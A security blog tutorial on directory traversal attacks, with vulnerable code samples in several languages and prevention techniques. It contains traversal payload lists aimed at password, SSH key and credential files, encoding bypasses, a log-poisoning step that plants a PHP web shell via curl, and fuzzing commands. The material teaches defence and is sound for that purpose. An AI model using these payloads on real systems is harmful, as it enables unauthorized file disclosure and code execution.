Directory Traversal Attacks
Thilan Dissanayaka Application Security April 09, 2020

Directory Traversal Attacks

Directory traversal is one of those vulnerabilities that makes you wonder how it still exists. The concept is dead simple — you manipulate a file path to escape the intended directory and read (or write) files elsewhere on the filesystem. A few ../ sequences, and you’re reading /etc/passwd, application config files, or source code containing database credentials.

It’s been in the OWASP Top 10 forever (under “Broken Access Control”), it’s trivially easy to test for, and yet it keeps showing up — because developers keep building file paths from user input without validation.

How Directory Traversal Works

Filesystems are hierarchical. Every file has a path relative to the root:

/
├── etc/
│   ├── passwd
│   ├── shadow
│   └── hosts
├── var/
│   └── www/
│       └── html/
│           ├── index.php
│           ├── images/
│           │   ├── logo.png
│           │   └── banner.jpg
│           └── uploads/
└── home/
    └── thilan/

The .. notation means “go up one directory.” So if you’re in /var/www/html/images/ and you reference ../../, you end up at /var/www/. Chain enough ../ sequences and you reach the root — from there you can access anything the web server process has permission to read.

The attack targets any feature where user input is used to construct a file path:

  • Image/file viewers (?file=report.pdf)
  • File download endpoints (?download=document.docx)
  • Template/page includes (?page=about)
  • Language file loaders (?lang=en)

The Classic Example

A web application serves images through a PHP script:

<?php
$image = $_GET['image'];
$path = '/var/www/html/images/' . $image;

header('Content-Type: image/jpeg');
readfile($path);
?>

Normal use:

GET /view.php?image=logo.png
→ Reads: /var/www/html/images/logo.png  ✓

Attack:

GET /view.php?image=../../../../etc/passwd
→ Reads: /var/www/html/images/../../../../etc/passwd
→ Resolves to: /etc/passwd  ← Game over

The ../../../../ walks up four directories from /var/www/html/images/ to /, then descends into etc/passwd. The server happily reads the file and sends it back.

/var/www/html/images/  ← starting here
../                    → /var/www/html/
../                    → /var/www/
../                    → /var/
../                    → /
etc/passwd             → /etc/passwd

What Attackers Target

Once you can read arbitrary files, here’s what’s valuable:

Linux Systems

# System files
../../../../etc/passwd              # User accounts (always readable)
../../../../etc/shadow              # Password hashes (usually needs root)
../../../../etc/hosts               # Network configuration
../../../../proc/self/environ       # Environment variables (may contain secrets)
../../../../proc/self/cmdline       # How the process was started

# Application files
../../../../var/www/html/config.php  # Database credentials
../../../../var/www/html/.env        # Environment configuration
../../../../var/log/apache2/access.log  # Web server logs

# SSH keys
../../../../home/thilan/.ssh/id_rsa  # Private SSH key
../../../../root/.ssh/id_rsa         # Root's private SSH key

Windows Systems

..\..\..\..\windows\system32\drivers\etc\hosts
..\..\..\..\windows\win.ini
..\..\..\..\inetpub\wwwroot\web.config   # IIS config with connection strings
..\..\..\..\users\administrator\.ssh\id_rsa

Note: Windows accepts both / and \ as path separators, which is important for bypass techniques.

Application Source Code

This is often more valuable than system files. Reading the application’s source code reveals:

  • Database credentials in config files
  • API keys and secrets
  • Business logic vulnerabilities
  • Other file paths to target
  • Internal API endpoints

Vulnerable Patterns Across Languages

PHP — File Inclusion

PHP’s include() and require() are especially dangerous because they don’t just read the file — they execute it as PHP code. This turns directory traversal into Remote Code Execution.

<?php
// VULNERABLE: Local File Inclusion (LFI)
$page = $_GET['page'];
include($page . '.php');
?>
GET /index.php?page=../../../../var/log/apache2/access

If the attacker can inject PHP code into the access log (via a crafted User-Agent header), the include() will execute it. This is the classic log poisoning technique.

# Step 1: Inject PHP into the access log via User-Agent
$ curl -A "<?php system(\$_GET['cmd']); ?>" http://target.com/

# Step 2: Include the log file (the .php extension is appended by the code)
GET /index.php?page=../../../../var/log/apache2/access&cmd=id

Python — Flask/Django

from flask import Flask, request, send_file

app = Flask(__name__)

@app.route('/download')
def download():
    filename = request.args.get('file')
    # VULNERABLE: User input directly in file path
    return send_file(f'/var/www/uploads/{filename}')
GET /download?file=../../../../etc/passwd

Node.js — Express

const express = require('express');
const path = require('path');
const fs = require('fs');

app.get('/files', (req, res) => {
    const filename = req.query.name;
    // VULNERABLE: Path concatenation with user input
    const filepath = path.join(__dirname, 'public', filename);
    res.sendFile(filepath);
});
GET /files?name=../../../../etc/passwd

Note: path.join() resolves .. sequences, so path.join('/app/public', '../../../../etc/passwd') returns /etc/passwd. It does NOT prevent traversal — it just normalizes the path.

Java — Servlet

@WebServlet("/download")
public class DownloadServlet extends HttpServlet {
    protected void doGet(HttpServletRequest request, HttpServletResponse response)
            throws ServletException, IOException {
        String filename = request.getParameter("file");
        // VULNERABLE: Direct path concatenation
        File file = new File("/var/www/uploads/" + filename);

        FileInputStream fis = new FileInputStream(file);
        // ... stream file to response
    }
}

Bypass Techniques

Developers often implement naive filters that attackers can bypass:

Bypass 1: URL Encoding

If the application blocks ../ but doesn’t decode before checking:

%2e%2e%2f                  → ../
%2e%2e/                    → ../
..%2f                      → ../
%2e%2e%5c                  → ..\  (Windows)

Double encoding (if the server decodes twice):

%252e%252e%252f            → %2e%2e%2f → ../

Bypass 2: Null Byte (PHP < 5.3.4)

If the application appends an extension:

include($_GET['page'] . '.php');

The attacker uses a null byte to truncate the extension:

GET /index.php?page=../../../../etc/passwd%00
→ include('../../../../etc/passwd\0.php')
→ C function stops at \0 → reads /etc/passwd

This was fixed in PHP 5.3.4 but is still relevant for legacy applications.

Bypass 3: Path Truncation

On older Windows systems and some configurations, very long paths get truncated:

../../../../etc/passwd/./././././././././././././.  (repeat until path limit)

Bypass 4: Alternative Separators

Windows accepts multiple separators:

..\..\..\..\etc\passwd
....//....//....//etc/passwd
..\/..\/..\/etc/passwd

Bypass 5: Bypassing Prefix Checks

If the application checks that the path starts with the expected directory:

$path = '/var/www/uploads/' . $_GET['file'];
if (strpos($path, '/var/www/uploads/') === 0) {
    readfile($path);  // Still vulnerable!
}

The check passes because the path starts with /var/www/uploads/ — but after ../ resolution, it escapes:

/var/www/uploads/../../../../etc/passwd
→ starts with /var/www/uploads/ ✓ (check passes)
→ resolves to /etc/passwd (traversal succeeds)

Prevention

1. Use basename() — Strip the Path Entirely

The simplest and most effective fix: use basename() to extract just the filename, discarding any directory components.

<?php
$filename = basename($_GET['file']);  // "../../../../etc/passwd" → "passwd"
$path = '/var/www/uploads/' . $filename;

if (file_exists($path)) {
    readfile($path);
} else {
    echo "File not found";
}
?>

This is the nuclear option — it completely removes any directory traversal. Use it when the user should only specify a filename, never a path.

2. Validate with realpath() — Verify After Resolution

Resolve the full path and verify it’s within the expected directory:

<?php
$baseDir = '/var/www/uploads/';
$filename = $_GET['file'];

$fullPath = realpath($baseDir . $filename);
$realBase = realpath($baseDir);

// Check that:
// 1. realpath() succeeded (file exists)
// 2. The resolved path starts with our base directory
if ($fullPath !== false && strpos($fullPath, $realBase) === 0) {
    readfile($fullPath);
} else {
    http_response_code(403);
    echo "Access denied";
}
?>

This handles all bypass techniques — realpath() resolves ../, symlinks, URL encoding, and everything else to the actual filesystem path. Then we verify the result is within our allowed directory.

3. Whitelist / ID Mapping — Don’t Use Filenames at All

The most secure approach: never let users specify filenames. Use an ID that maps to a predefined file:

<?php
$fileMap = [
    '1' => '/var/www/uploads/report-q1.pdf',
    '2' => '/var/www/uploads/report-q2.pdf',
    '3' => '/var/www/uploads/brochure.pdf',
];

$id = $_GET['id'];

if (isset($fileMap[$id])) {
    readfile($fileMap[$id]);
} else {
    http_response_code(404);
    echo "File not found";
}
?>

No user-controlled path. No traversal possible. The attacker can only access files you explicitly listed.

4. Python — Secure Path Handling

import os
from flask import Flask, request, send_file, abort

app = Flask(__name__)
UPLOAD_DIR = '/var/www/uploads'

@app.route('/download')
def download():
    filename = request.args.get('file', '')

    # Resolve the full path
    full_path = os.path.realpath(os.path.join(UPLOAD_DIR, filename))

    # Verify it's within the upload directory
    if not full_path.startswith(os.path.realpath(UPLOAD_DIR)):
        abort(403)

    if not os.path.isfile(full_path):
        abort(404)

    return send_file(full_path)

5. Node.js — Secure Path Handling

const path = require('path');
const fs = require('fs');

const UPLOAD_DIR = path.resolve(__dirname, 'uploads');

app.get('/files', (req, res) => {
    const filename = req.query.name;
    const fullPath = path.resolve(UPLOAD_DIR, filename);

    // Verify the resolved path is within our directory
    if (!fullPath.startsWith(UPLOAD_DIR)) {
        return res.status(403).send('Access denied');
    }

    if (!fs.existsSync(fullPath)) {
        return res.status(404).send('Not found');
    }

    res.sendFile(fullPath);
});

The pattern is the same in every language: resolve the full path, then verify it’s within the allowed directory.

6. Web Server Configuration

As an additional layer, configure your web server to restrict file access:

# Nginx — restrict access to sensitive files
location ~ /\. {
    deny all;  # Block dotfiles (.env, .git, .htaccess)
}

location ~* \.(conf|ini|log|sh|sql)$ {
    deny all;  # Block sensitive file extensions
}
# Apache — same in .htaccess
<FilesMatch "\.(conf|ini|log|sh|sql|env)$">
    Require all denied
</FilesMatch>

Testing for Directory Traversal

Manual Testing

# Basic traversal
curl "http://target.com/view?file=../../../../etc/passwd"

# URL encoded
curl "http://target.com/view?file=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd"

# Double encoded
curl "http://target.com/view?file=%252e%252e%252f%252e%252e%252fetc%252fpasswd"

# Null byte (legacy PHP)
curl "http://target.com/view?file=../../../../etc/passwd%00"

# Windows paths
curl "http://target.com/view?file=..\..\..\..\windows\win.ini"

With Burp Suite

Intruder with a wordlist of traversal payloads is the fastest approach. The dotdotpwn wordlist covers hundreds of encoding variations.

Automated

# Using ffuf with a traversal wordlist
$ ffuf -u "http://target.com/view?file=FUZZ" -w traversal-payloads.txt -mc 200

# Using dotdotpwn
$ dotdotpwn -m http -h target.com -f /etc/passwd

Final Thoughts

Directory traversal is a solved problem from a technical standpoint. The fix is well-known: resolve the path, validate it’s within the allowed directory. realpath() + prefix check, or basename(), or ID mapping — pick any of them and the vulnerability disappears.

Yet it keeps showing up in production code because developers build file paths from user input without thinking about it. Every open(), include(), readfile(), send_file(), or readFileSync() that touches user input is a potential traversal point.

The mental model is simple: never trust a user-controlled path. Validate it after resolution, not before. And when possible, don’t use paths at all — use IDs that map to files server-side.

Thanks for reading!

ALSO READ
Blockchain 0x000 – Understanding the Fundamentals
May 21, 2020 Web3 Development

Imagine a world where strangers can exchange money, share data, or execute agreements without ever needing to trust a central authority. No banks, no intermediaries, no single point of failure yet...

Identity and Access Management (IAM)
May 11, 2020 Identity & Access Management

Who are you — and what are you allowed to do? That's the fundamental question every secure system must answer. And it's exactly what Identity and Access Management (IAM) is built to solve.

How I built a web based CPU Simulator
May 07, 2020 Pet Projects

As someone passionate about computer engineering, reverse engineering, and system internals, I've always been fascinated by what happens "under the hood" of a computer. This curiosity led me to...

Writing a Shell Code for Linux
Apr 21, 2020 Exploit Development

Shellcode is a small piece of machine code used as the payload in exploit development. In this post, we write Linux shellcode from scratch — starting with a simple exit, building up to spawning a shell, and explaining every decision along the way.

Exploiting a Stack Buffer Overflow on Windows
Apr 12, 2020 Exploit Development

In a previous tutorial we discusses how we can exploit a buffer overflow vulnerability on a Linux machine. I wen through all theories in depth and explained each step. Now today we are going to jump...

Access Control Models
Apr 08, 2020 Identity & Access Management

Access control is one of the most fundamental concepts in security. Every time you set file permissions, assign user roles, or restrict access to a resource, you're implementing some form of access control. But not all access control is created equal...

Exploiting a  Stack Buffer Overflow  on Linux
Apr 01, 2020 Exploit Development

Have you ever wondered how attackers gain control over remote servers? How do they just run some exploit and compromise a computer? If we dive into the actual context, there is no magic happening....

Basic concepts of Cryptography
Mar 01, 2020 Cryptography

Ever notice that little padlock icon in your browser's address bar? That's cryptography working silently in the background, protecting everything you do online. Whether you're sending an email,...

Common Web Application Attacks
Feb 05, 2020 Application Security

Web applications are one of the most targeted surfaces by attackers. This is primarily because they are accessible over the internet, making them exposed and potentially vulnerable. Since these...

Remote Code Execution (RCE)
Jan 02, 2020 Application Security

Remote Code Execution (RCE) is the holy grail of application security vulnerabilities. It allows an attacker to execute arbitrary code on a remote server — and the consequences are as bad as it sounds. In this post, we'll go deep into RCE across multiple languages, including PHP, Java, Python, and Node.js.